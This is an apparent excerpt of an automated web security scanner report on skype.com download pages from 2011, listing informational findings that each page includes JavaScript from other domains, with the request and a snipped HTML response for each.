Date: Sun, 04 Sep 2011 21:39:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 50255


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download the latest version of Skype for Linux</title>
   <meta name="description" content
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.602. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/linux/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/linux/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 50255


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download the latest version of Skype for Linux</title>
   <meta name="description" content
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.603. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/macosx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/macosx HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 59229


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.3 for Mac OS X - Now with HD Video Calls - Skype</title>
   <meta name="descriptio
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.604. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/macosx/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/macosx/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 59229


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.3 for Mac OS X - Now with HD Video Calls - Skype</title>
   <meta name="descriptio
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.605. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/windows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/windows HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56056


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.5 for Windows - Download the latest version of Skype and get free computer calls<
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.606. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/windows/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/windows/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56056


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.5 for Windows - Download the latest version of Skype and get free computer calls<
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.607. http://www.skype.com/intl/en-us/get-skype/on-your-mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40925


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype on your Mobile</title>
   <meta name="description" content="Get Skype on your mobile
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.608. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40925


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype on your Mobile</title>
   <meta name="description" content="Get Skype on your mobile
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.609. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/builtin/nokia-n900  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/builtin/nokia-n900

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/builtin/nokia-n900 HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/n900.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.610. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48051


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for iPad - iPad Video Chat - Skype</title>
   <meta name="description" content="Down
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.611. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48051


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for iPad - iPad Video Chat - Skype</title>
   <meta name="description" content="Down
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.612. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44768


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download Skype for iPhone and iPod Touch - Skype</title>
   <meta name="description" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.613. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 44768


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download Skype for iPhone and iPod Touch - Skype</title>
   <meta name="description" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.614. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/skype-for-android

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/skype-for-android HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 53155


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Chatting and 3G Calls on Android - Skype for Android - Skype</title>
   <meta name="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.615. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/skype-for-android/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/skype-for-android/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:54 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 53155


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Chatting and 3G Calls on Android - Skype for Android - Skype</title>
   <meta name="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.616. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56535


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Symbian ... download for your phone</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.617. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:52 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56535


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Symbian ... download for your phone</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.618. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/skype-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/skype-mobile HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/mobile_v2.js" type="text/javascript" xml:space="preserve">
</script>
